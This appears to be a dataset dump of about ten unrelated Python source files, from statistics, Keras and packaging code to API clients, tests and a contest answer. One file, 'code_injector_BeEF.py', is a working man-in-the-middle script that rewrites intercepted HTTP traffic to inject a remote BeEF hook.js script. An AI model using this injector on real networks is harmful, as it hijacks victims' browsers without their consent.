:param k: coefficient corresponding to the regressor with respect to which we want to take the marginal effects
:return: an array with the marginal effects estimated at each observation's level
The marginal effect of regressor k on individual i's y is defined as the product of coef[k] and the normal cdf
evaluated at x_i * coeff[k] / sigma
"""
return self.coef_[k] * norm.cdf(self.predict(x) / self.sigma_) | en | 0.78234 | # edit # s = math.exp(params[-1]) # log_ndtr(concat_stats) # s = math.exp(params[-1]) # in censReg, not using chain rule as below; they optimize in terms of log(s) # by chain rule, since the expression above is dloglik/dlogsigma Fit a maximum-likelihood Tobit regression :param x: Pandas DataFrame (n_samples, n_features): Data :param y: Pandas Series (n_samples,): Target :param cens: Pandas Series (n_samples,): -1 indicates left-censored samples, 0 for uncensored, 1 for right-censored :param verbose: boolean, show info from minimization :return: # EDIT - insert marginal effects function Marginal effects on dependent variable of a regressor, identified by coef :param x: array with all regressors (independent variables) to make a prediction :param k: coefficient corresponding to the regressor with respect to which we want to take the marginal effects :return: an array with the marginal effects estimated at each observation's level The marginal effect of regressor k on individual i's y is defined as the product of coef[k] and the normal cdf evaluated at x_i * coeff[k] / sigma | 2.608687 | 3 |
setup.py | Raymond38324/hagworm | 0 | 10371 | <filename>setup.py
# -*- coding: utf-8 -*-
import setuptools
with open(r'README.md', r'r', encoding="utf8") as stream:
long_description = stream.read()
setuptools.setup(
name=r'hagworm',
version=r'3.0.0',
license=r'Apache License Version 2.0',
platforms=[r'all'],
author=r'Shaobo.Wang',
author_email=r'<EMAIL>',
description=r'Network Development Suite',
long_description=long_description,
long_description_content_type=r'text/markdown',
url=r'https://github.com/wsb310/hagworm',
packages=setuptools.find_packages(),
package_data={r'hagworm': [r'static/*.*']},
python_requires=r'>= 3.7',
install_requires=[
r'aioftp==0.13.0',
r'aiohttp==3.5.4',
r'aiokafka==0.5.2',
r'aiomysql==0.0.20',
r'aioredis==1.2.0',
r'cacheout==0.11.1',
r'crontab==0.22.6',
r'cryptography==2.7.0',
r'hiredis==1.0.0',
r'Jinja2==2.10.1',
r'tornado-jinja2==0.2.4',
r'loguru==0.3.0',
r'motor==2.0.0',
r'mq_http_sdk==1.0.1',
r'objgraph==3.4.1',
r'Pillow==6.1.0',
r'psutil==5.6.3',
r'PyJWT==1.7.1',
r'pytest==5.0.1',
r'pytest-asyncio==0.10.0',
r'Sphinx==2.1.2',
r'SQLAlchemy==1.3.5',
r'tornado==6.0.3',
r'xlwt==1.3.0',
r'xmltodict==0.12.0',
],
classifiers=[
r'Programming Language :: Python :: 3.7',
r'License :: OSI Approved :: Apache Software License',
r'Operating System :: POSIX :: Linux',
],
)
| <filename>setup.py
# -*- coding: utf-8 -*-
import setuptools
with open(r'README.md', r'r', encoding="utf8") as stream:
long_description = stream.read()
setuptools.setup(
name=r'hagworm',
version=r'3.0.0',
license=r'Apache License Version 2.0',
platforms=[r'all'],
author=r'Shaobo.Wang',
author_email=r'<EMAIL>',
description=r'Network Development Suite',
long_description=long_description,
long_description_content_type=r'text/markdown',
url=r'https://github.com/wsb310/hagworm',
packages=setuptools.find_packages(),
package_data={r'hagworm': [r'static/*.*']},
python_requires=r'>= 3.7',
install_requires=[
r'aioftp==0.13.0',
r'aiohttp==3.5.4',
r'aiokafka==0.5.2',
r'aiomysql==0.0.20',
r'aioredis==1.2.0',
r'cacheout==0.11.1',
r'crontab==0.22.6',
r'cryptography==2.7.0',
r'hiredis==1.0.0',
r'Jinja2==2.10.1',
r'tornado-jinja2==0.2.4',
r'loguru==0.3.0',
r'motor==2.0.0',
r'mq_http_sdk==1.0.1',
r'objgraph==3.4.1',
r'Pillow==6.1.0',
r'psutil==5.6.3',
r'PyJWT==1.7.1',
r'pytest==5.0.1',
r'pytest-asyncio==0.10.0',
r'Sphinx==2.1.2',
r'SQLAlchemy==1.3.5',
r'tornado==6.0.3',
r'xlwt==1.3.0',
r'xmltodict==0.12.0',
],
classifiers=[
r'Programming Language :: Python :: 3.7',
r'License :: OSI Approved :: Apache Software License',
r'Operating System :: POSIX :: Linux',
],
)
| en | 0.769321 | # -*- coding: utf-8 -*- | 1.363825 | 1 |
mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | 0 | 10372 | """
Simple IoC containers that provide direct access to various Keras providers
"""
class ModelSavers:
from mercury_ml.keras.providers import model_saving
save_hdf5 = model_saving.save_keras_hdf5
save_tensorflow_graph = model_saving.save_tensorflow_graph
save_tensorrt_pbtxt_config = model_saving.save_tensorrt_pbtxt_config
save_tensorrt_json_config = model_saving.save_tensorrt_json_config
save_labels_txt = model_saving.save_labels_txt
save_tensorflow_serving_predict_signature_def = model_saving.save_tensorflow_serving_predict_signature_def
class ModelLoaders:
from mercury_ml.keras.providers import model_loading
load_hdf5 = model_loading.load_hdf5_model
class LossFunctionFetchers:
from mercury_ml.keras.providers import loss_function_fetching
get_keras_loss = loss_function_fetching.get_keras_loss
get_custom_loss = loss_function_fetching.get_custom_loss
class OptimizerFetchers:
from mercury_ml.keras.providers import optimizer_fetching
get_keras_optimizer = optimizer_fetching.get_keras_optimizer
class ModelCompilers:
from mercury_ml.keras.providers import model_compilation
compile_model = model_compilation.compile_model
class ModelFitters:
from mercury_ml.keras.providers import model_fitting
fit = model_fitting.fit
fit_generator = model_fitting.fit_generator
class ModelDefinitions:
from mercury_ml.keras.providers.model_definition import conv_simple, mlp_simple
# these are just two small example model definitions. Users should define their own models
# to use as follows:
# >>> ModelDefinitions.my_model = my_model_module.define_model
define_conv_simple = conv_simple.define_model
define_mlp_simple = mlp_simple.define_model
class GeneratorPreprocessingFunctionGetters:
from mercury_ml.keras.providers.generator_preprocessors import get_random_eraser
get_random_eraser = get_random_eraser
class CallBacks:
from mercury_ml.keras.providers.model_callbacks import TensorBoardProvider, \
BaseLoggerProvider, EarlyStoppingProvider, ModelCheckpointProvider, TerminateOnNaNProvider, \
ProgbarLoggerProvider, RemoteMonitorProvider, LearningRateSchedulerProvider, ReduceLROnPlateauProvider, \
CSVLoggerProvider
tensorboard = TensorBoardProvider
base_logger = BaseLoggerProvider
terminate_on_nan = TerminateOnNaNProvider
progbar_logger = ProgbarLoggerProvider
model_checkpoint = ModelCheckpointProvider
early_stopping = EarlyStoppingProvider
remote_monitor = RemoteMonitorProvider
learning_rate_scheduler = LearningRateSchedulerProvider
reduce_lr_on_plateau = ReduceLROnPlateauProvider
csv_logger = CSVLoggerProvider
class ModelEvaluators:
from mercury_ml.keras.providers import model_evaluation
evaluate = model_evaluation.evaluate
evaluate_generator = model_evaluation.evaluate_generator
class PredictionFunctions:
from mercury_ml.keras.providers import prediction
predict = prediction.predict
predict_generator = prediction.predict_generator
| """
Simple IoC containers that provide direct access to various Keras providers
"""
class ModelSavers:
from mercury_ml.keras.providers import model_saving
save_hdf5 = model_saving.save_keras_hdf5
save_tensorflow_graph = model_saving.save_tensorflow_graph
save_tensorrt_pbtxt_config = model_saving.save_tensorrt_pbtxt_config
save_tensorrt_json_config = model_saving.save_tensorrt_json_config
save_labels_txt = model_saving.save_labels_txt
save_tensorflow_serving_predict_signature_def = model_saving.save_tensorflow_serving_predict_signature_def
class ModelLoaders:
from mercury_ml.keras.providers import model_loading
load_hdf5 = model_loading.load_hdf5_model
class LossFunctionFetchers:
from mercury_ml.keras.providers import loss_function_fetching
get_keras_loss = loss_function_fetching.get_keras_loss
get_custom_loss = loss_function_fetching.get_custom_loss
class OptimizerFetchers:
from mercury_ml.keras.providers import optimizer_fetching
get_keras_optimizer = optimizer_fetching.get_keras_optimizer
class ModelCompilers:
from mercury_ml.keras.providers import model_compilation
compile_model = model_compilation.compile_model
class ModelFitters:
from mercury_ml.keras.providers import model_fitting
fit = model_fitting.fit
fit_generator = model_fitting.fit_generator
class ModelDefinitions:
from mercury_ml.keras.providers.model_definition import conv_simple, mlp_simple
# these are just two small example model definitions. Users should define their own models
# to use as follows:
# >>> ModelDefinitions.my_model = my_model_module.define_model
define_conv_simple = conv_simple.define_model
define_mlp_simple = mlp_simple.define_model
class GeneratorPreprocessingFunctionGetters:
from mercury_ml.keras.providers.generator_preprocessors import get_random_eraser
get_random_eraser = get_random_eraser
class CallBacks:
from mercury_ml.keras.providers.model_callbacks import TensorBoardProvider, \
BaseLoggerProvider, EarlyStoppingProvider, ModelCheckpointProvider, TerminateOnNaNProvider, \
ProgbarLoggerProvider, RemoteMonitorProvider, LearningRateSchedulerProvider, ReduceLROnPlateauProvider, \
CSVLoggerProvider
tensorboard = TensorBoardProvider
base_logger = BaseLoggerProvider
terminate_on_nan = TerminateOnNaNProvider
progbar_logger = ProgbarLoggerProvider
model_checkpoint = ModelCheckpointProvider
early_stopping = EarlyStoppingProvider
remote_monitor = RemoteMonitorProvider
learning_rate_scheduler = LearningRateSchedulerProvider
reduce_lr_on_plateau = ReduceLROnPlateauProvider
csv_logger = CSVLoggerProvider
class ModelEvaluators:
from mercury_ml.keras.providers import model_evaluation
evaluate = model_evaluation.evaluate
evaluate_generator = model_evaluation.evaluate_generator
class PredictionFunctions:
from mercury_ml.keras.providers import prediction
predict = prediction.predict
predict_generator = prediction.predict_generator
| en | 0.849501 | Simple IoC containers that provide direct access to various Keras providers # these are just two small example model definitions. Users should define their own models # to use as follows: # >>> ModelDefinitions.my_model = my_model_module.define_model | 2.410166 | 2 |
Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 0 | 10373 | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will use on line 23 and 28 and uncomment them."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
#try:
#.decode() in load
load = scapy_packet[scapy.Raw].load
if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Request")
# print(scapy_packet.show())
load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
elif scapy_packet[scapy.TCP].sport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Response")
#print(scapy_packet.show())
injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load(scapy_packet, load)
packet.set_payload(str(new_packet))
#except UnicodeDecodeError:
# pass
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will use on line 23 and 28 and uncomment them."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
#try:
#.decode() in load
load = scapy_packet[scapy.Raw].load
if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Request")
# print(scapy_packet.show())
load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
elif scapy_packet[scapy.TCP].sport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Response")
#print(scapy_packet.show())
injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load(scapy_packet, load)
packet.set_payload(str(new_packet))
#except UnicodeDecodeError:
# pass
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| en | 0.540625 | #!/usr/bin/env python Modify downloads files on the fly while target uses HTTP/HTTPS. Do not forget to choose the port you will use on line 23 and 28 and uncomment them. #try: #.decode() in load #CHOOSE PORT HERE: 80 / 10000: # print(scapy_packet.show()) #CHOOSE PORT HERE: 80 / 10000: #print(scapy_packet.show()) #except UnicodeDecodeError: # pass | 2.87551 | 3 |
pycardcast/net/aiohttp.py | Elizafox/pycardcast | 0 | 10374 | # Copyright © 2015 <NAME>.
# All rights reserved.
# This file is part of the pycardcast project. See LICENSE in the root
# directory for licensing information.
import asyncio
import aiohttp
from pycardcast.net import CardcastAPIBase
from pycardcast.deck import (DeckInfo, DeckInfoNotFoundError,
DeckInfoRetrievalError)
from pycardcast.card import (BlackCard, WhiteCard, CardNotFoundError,
CardRetrievalError)
from pycardcast.search import (SearchReturn, SearchNotFoundError,
SearchRetrievalError)
class CardcastAPI(CardcastAPIBase):
"""A :py:class:`~pycardcast.net.CardcastAPIBase` implementation using the
aiohttp library.
All the methods here are coroutines except for one:
:py:meth:`~pycardcast.net.aiohttp.CardcastAPI.search_iter`.
"""
@asyncio.coroutine
def deck_info(self, code):
req = yield from aiohttp.request("get", self.deck_info_url.format
code=code))
if req.status == 200:
json=yield from req.json()
return DeckInfo.from_json(json)
elif req.status == 404:
err="Deck not found: {}".format(code)
raise DeckInfoNotFoundError(err)
else:
err="Error retrieving deck: {} (code {})".format(code,
req.status)
raise DeckInfoRetrievalError(err)
@asyncio.coroutine
def white_cards(self, code):
req=yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json=yield from req.json()
return WhiteCard.from_json(json)
elif req.status == 404:
err="White cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err="Error retrieving white cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def black_cards(self, code):
req = yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return BlackCard.from_json(json)
elif req.status == 404:
err = "Black cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving black cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def cards(self, code):
req = yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return (BlackCard.from_json(json), WhiteCard.from_json(json))
elif req.status == 404:
err = "Cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving cards: {} (code {})".format(code,
req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def deck(self, code):
deckinfo = yield from self.deck_info(code)
cards = yield from self.cards(code)
return Deck(deckinfo, cards[0], cards[1])
@asyncio.coroutine
def search(self, name=None, author=None, category=None, offset=0,
limit=None):
qs = {
"search": name,
"author": author,
"category": category,
"offset": offset,
"limit": (deck_list_max if limit is None else limit)
}
req = yield from aiohtp.request("get", self.deck_list_url, params=qs)
if req.status == 200:
json = yield from req.json()
return SearchReturn.from_json(json)
elif req.status == 404:
err = "Search query returned not found"
raise SearchNotFoundError(err)
else:
err = "Error searching decks (code {})".format(req.status)
raise SearchRetrievalError(err)
def search_iter(self, name=None, author=None, category=None, offset=0,
limit=None):
s = asyncio.run_until_complete(self.search(name, author, category,
offset, limit))
while s.count > 0:
yield s
offset += s.count
s = asyncio.run_until_complete(self.search(name, author, category,
offset, limit))
| # Copyright © 2015 <NAME>.
# All rights reserved.
# This file is part of the pycardcast project. See LICENSE in the root
# directory for licensing information.
import asyncio
import aiohttp
from pycardcast.net import CardcastAPIBase
from pycardcast.deck import (DeckInfo, DeckInfoNotFoundError,
DeckInfoRetrievalError)
from pycardcast.card import (BlackCard, WhiteCard, CardNotFoundError,
CardRetrievalError)
from pycardcast.search import (SearchReturn, SearchNotFoundError,
SearchRetrievalError)
class CardcastAPI(CardcastAPIBase):
"""A :py:class:`~pycardcast.net.CardcastAPIBase` implementation using the
aiohttp library.
All the methods here are coroutines except for one:
:py:meth:`~pycardcast.net.aiohttp.CardcastAPI.search_iter`.
"""
@asyncio.coroutine
def deck_info(self, code):
req = yield from aiohttp.request("get", self.deck_info_url.format
code=code))
if req.status == 200:
json=yield from req.json()
return DeckInfo.from_json(json)
elif req.status == 404:
err="Deck not found: {}".format(code)
raise DeckInfoNotFoundError(err)
else:
err="Error retrieving deck: {} (code {})".format(code,
req.status)
raise DeckInfoRetrievalError(err)
@asyncio.coroutine
def white_cards(self, code):
req=yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json=yield from req.json()
return WhiteCard.from_json(json)
elif req.status == 404:
err="White cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err="Error retrieving white cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def black_cards(self, code):
req = yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return BlackCard.from_json(json)
elif req.status == 404:
err = "Black cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving black cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def cards(self, code):
req = yield from aiohtp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return (BlackCard.from_json(json), WhiteCard.from_json(json))
elif req.status == 404:
err = "Cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving cards: {} (code {})".format(code,
req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def deck(self, code):
deckinfo = yield from self.deck_info(code)
cards = yield from self.cards(code)
return Deck(deckinfo, cards[0], cards[1])
@asyncio.coroutine
def search(self, name=None, author=None, category=None, offset=0,
limit=None):
qs = {
"search": name,
"author": author,
"category": category,
"offset": offset,
"limit": (deck_list_max if limit is None else limit)
}
req = yield from aiohtp.request("get", self.deck_list_url, params=qs)
if req.status == 200:
json = yield from req.json()
return SearchReturn.from_json(json)
elif req.status == 404:
err = "Search query returned not found"
raise SearchNotFoundError(err)
else:
err = "Error searching decks (code {})".format(req.status)
raise SearchRetrievalError(err)
def search_iter(self, name=None, author=None, category=None, offset=0,
limit=None):
s = asyncio.run_until_complete(self.search(name, author, category,
offset, limit))
while s.count > 0:
yield s
offset += s.count
s = asyncio.run_until_complete(self.search(name, author, category,
offset, limit))
| en | 0.705087 | # Copyright © 2015 <NAME>. # All rights reserved. # This file is part of the pycardcast project. See LICENSE in the root # directory for licensing information. A :py:class:`~pycardcast.net.CardcastAPIBase` implementation using the aiohttp library. All the methods here are coroutines except for one: :py:meth:`~pycardcast.net.aiohttp.CardcastAPI.search_iter`. | 2.503793 | 3 |
libtiepie/triggeroutput.py | TiePie/python-libtiepie | 6 | 10375 | <gh_stars>1-10
from ctypes import *
from .api import api
from .const import *
from .library import library
class TriggerOutput(object):
""""""
def __init__(self, handle, index):
self._handle = handle
self._index = index
def _get_enabled(self):
""" Check whether a trigger output is enabled. """
value = api.DevTrOutGetEnabled(self._handle, self._index)
library.check_last_status_raise_on_error()
return value != BOOL8_FALSE
def _set_enabled(self, value):
value = BOOL8_TRUE if value else BOOL8_FALSE
api.DevTrOutSetEnabled(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_events(self):
""" Supported trigger output events. """
value = api.DevTrOutGetEvents(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_event(self):
""" Currently selected trigger output event. """
value = api.DevTrOutGetEvent(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _set_event(self, value):
api.DevTrOutSetEvent(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_id(self):
""" Id. """
value = api.DevTrOutGetId(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_name(self):
""" Name. """
length = api.DevTrOutGetName(self._handle, self._index, None, 0)
library.check_last_status_raise_on_error()
buf = create_string_buffer(length + 1)
api.DevTrOutGetName(self._handle, self._index, buf, length)
library.check_last_status_raise_on_error()
return buf.value.decode('utf-8')
def trigger(self):
""" Trigger the specified device trigger output.
:returns: ``True`` if successful, ``False`` otherwise.
.. versionadded:: 0.6
"""
result = api.DevTrOutTrigger(self._handle, self._index)
library.check_last_status_raise_on_error()
return result != BOOL8_FALSE
enabled = property(_get_enabled, _set_enabled)
events = property(_get_events)
event = property(_get_event, _set_event)
id = property(_get_id)
name = property(_get_name)
| from ctypes import *
from .api import api
from .const import *
from .library import library
class TriggerOutput(object):
""""""
def __init__(self, handle, index):
self._handle = handle
self._index = index
def _get_enabled(self):
""" Check whether a trigger output is enabled. """
value = api.DevTrOutGetEnabled(self._handle, self._index)
library.check_last_status_raise_on_error()
return value != BOOL8_FALSE
def _set_enabled(self, value):
value = BOOL8_TRUE if value else BOOL8_FALSE
api.DevTrOutSetEnabled(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_events(self):
""" Supported trigger output events. """
value = api.DevTrOutGetEvents(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_event(self):
""" Currently selected trigger output event. """
value = api.DevTrOutGetEvent(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _set_event(self, value):
api.DevTrOutSetEvent(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_id(self):
""" Id. """
value = api.DevTrOutGetId(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_name(self):
""" Name. """
length = api.DevTrOutGetName(self._handle, self._index, None, 0)
library.check_last_status_raise_on_error()
buf = create_string_buffer(length + 1)
api.DevTrOutGetName(self._handle, self._index, buf, length)
library.check_last_status_raise_on_error()
return buf.value.decode('utf-8')
def trigger(self):
""" Trigger the specified device trigger output.
:returns: ``True`` if successful, ``False`` otherwise.
.. versionadded:: 0.6
"""
result = api.DevTrOutTrigger(self._handle, self._index)
library.check_last_status_raise_on_error()
return result != BOOL8_FALSE
enabled = property(_get_enabled, _set_enabled)
events = property(_get_events)
event = property(_get_event, _set_event)
id = property(_get_id)
name = property(_get_name) | en | 0.657242 | Check whether a trigger output is enabled. Supported trigger output events. Currently selected trigger output event. Id. Name. Trigger the specified device trigger output. :returns: ``True`` if successful, ``False`` otherwise. .. versionadded:: 0.6 | 2.331322 | 2 |
conduit_rest/radish/conduit_rest_steps.py | dduleba/tw2019-ui-tests | 1 | 10376 | import time
from faker import Faker
from radish_ext.radish.step_config import StepConfig
from conduit.client import ConduitClient, ConduitConfig
class ConduitStepsConfig(StepConfig):
def __init__(self, context):
super().__init__(context)
self._faker = None
self.client = ConduitClient(ConduitConfig().set_properties(context.cfg.get('conduit_backend').get('url')))
@property
def faker(self):
if self._faker is None:
self._faker = Faker(locale='en-us')
seed = time.time()
self.log.debug(f'Faker seed {seed}')
self._faker.seed()
return self._faker
def get_conduit_config(context):
return ConduitStepsConfig.get_instance(context)
class ConduitRestBaseSteps(object):
def created_user(self, step, ):
"""created User"""
stc_rest = get_conduit_config(step.context)
user_model = {'user': {'username': stc_rest.faker.user_name(),
'password': <PASSWORD>(),
'email': stc_rest.faker.email()
}
}
stc_rest.test_data.data.update(user_model)
stc_rest.log.debug(user_model)
ret_json = stc_rest.client.users.register_user(**user_model['user'])
stc_rest.log.info(f'user created {ret_json}')
| import time
from faker import Faker
from radish_ext.radish.step_config import StepConfig
from conduit.client import ConduitClient, ConduitConfig
class ConduitStepsConfig(StepConfig):
def __init__(self, context):
super().__init__(context)
self._faker = None
self.client = ConduitClient(ConduitConfig().set_properties(context.cfg.get('conduit_backend').get('url')))
@property
def faker(self):
if self._faker is None:
self._faker = Faker(locale='en-us')
seed = time.time()
self.log.debug(f'Faker seed {seed}')
self._faker.seed()
return self._faker
def get_conduit_config(context):
return ConduitStepsConfig.get_instance(context)
class ConduitRestBaseSteps(object):
def created_user(self, step, ):
"""created User"""
stc_rest = get_conduit_config(step.context)
user_model = {'user': {'username': stc_rest.faker.user_name(),
'password': <PASSWORD>(),
'email': stc_rest.faker.email()
}
}
stc_rest.test_data.data.update(user_model)
stc_rest.log.debug(user_model)
ret_json = stc_rest.client.users.register_user(**user_model['user'])
stc_rest.log.info(f'user created {ret_json}')
| en | 0.981775 | created User | 2.264311 | 2 |
SummaryExternalClient.py | Hackillinois2k18/Main-Repo | 5 | 10377 | <filename>SummaryExternalClient.py<gh_stars>1-10
import requests
import credentials
class SummaryExternalClient:
def pullSummaryForUrl(self, artUrl, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"url" : artUrl,
"title" : title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
def pullSummaryForText(self, text, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"text": text,
"title": title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
| <filename>SummaryExternalClient.py<gh_stars>1-10
import requests
import credentials
class SummaryExternalClient:
def pullSummaryForUrl(self, artUrl, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"url" : artUrl,
"title" : title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
def pullSummaryForText(self, text, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"text": text,
"title": title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
| none | 1 | 3.048499 | 3 |
|
tests/test_render.py | isuruf/conda-build | 0 | 10378 | import os
import sys
from conda_build import api
from conda_build import render
import pytest
def test_output_with_noarch_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch'] = 'python'
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_output_with_noarch_python_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch_python'] = True
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_reduce_duplicate_specs(testing_metadata):
reqs = {'build': ['exact', 'exact 1.2.3 1', 'exact >1.0,<2'],
'host': ['exact', 'exact 1.2.3 1']
}
testing_metadata.meta['requirements'] = reqs
render._simplify_to_exact_constraints(testing_metadata)
assert (testing_metadata.meta['requirements']['build'] ==
testing_metadata.meta['requirements']['host'])
simplified_deps = testing_metadata.meta['requirements']
assert len(simplified_deps['build']) == 1
assert 'exact 1.2.3 1' in simplified_deps['build']
def test_pin_run_as_build_preserve_string(testing_metadata):
m = testing_metadata
m.config.variant['pin_run_as_build']['pkg'] = {
'max_pin': 'x.x'
}
dep = render.get_pin_from_build(
m,
'pkg * somestring*',
{'pkg': '1.2.3 somestring_h1234'}
)
assert dep == 'pkg >=1.2.3,<1.3.0a0 somestring*'
| import os
import sys
from conda_build import api
from conda_build import render
import pytest
def test_output_with_noarch_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch'] = 'python'
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_output_with_noarch_python_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch_python'] = True
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_reduce_duplicate_specs(testing_metadata):
reqs = {'build': ['exact', 'exact 1.2.3 1', 'exact >1.0,<2'],
'host': ['exact', 'exact 1.2.3 1']
}
testing_metadata.meta['requirements'] = reqs
render._simplify_to_exact_constraints(testing_metadata)
assert (testing_metadata.meta['requirements']['build'] ==
testing_metadata.meta['requirements']['host'])
simplified_deps = testing_metadata.meta['requirements']
assert len(simplified_deps['build']) == 1
assert 'exact 1.2.3 1' in simplified_deps['build']
def test_pin_run_as_build_preserve_string(testing_metadata):
m = testing_metadata
m.config.variant['pin_run_as_build']['pkg'] = {
'max_pin': 'x.x'
}
dep = render.get_pin_from_build(
m,
'pkg * somestring*',
{'pkg': '1.2.3 somestring_h1234'}
)
assert dep == 'pkg >=1.2.3,<1.3.0a0 somestring*'
| none | 1 | 2.063212 | 2 |
|
ABC/007/b.py | fumiyanll23/AtCoder | 0 | 10379 | <reponame>fumiyanll23/AtCoder
def main():
# input
A = input()
# compute
# output
if A == 'a':
print(-1)
else:
print('a')
if __name__ == '__main__':
main()
| def main():
# input
A = input()
# compute
# output
if A == 'a':
print(-1)
else:
print('a')
if __name__ == '__main__':
main() | en | 0.213219 | # input # compute # output | 3.409334 | 3 |
SPAE/read_write.py | simon-schuler/SPAE | 0 | 10380 | #Writing MOOG parameter file for the parameter, abundance, and error calculations.
#The parameter file only needs to be written once, at beginning of the routine, because the output
#files are overwritten with each itereation of the routine, only minimal output data are needed.
#
#The user can choose to have the parameter file written to screen by choosing verbose=True
#The user can choose to have more detailed MOOG output by chooseing the appropriate values for the
#MOOG input parameters.
import numpy as np
def param_file(linelist,atmosphere=0,molecules=1,lines=0,flux=0,damp=0,plot=0,units=0,verbose=False):
if verbose:
print('abfind')
print('terminal \'x11\'')
print('standard_out \'moog_out.1\'')
print('summary_out \'moog_out.2\'')
print('model_in \'star.mod\'')
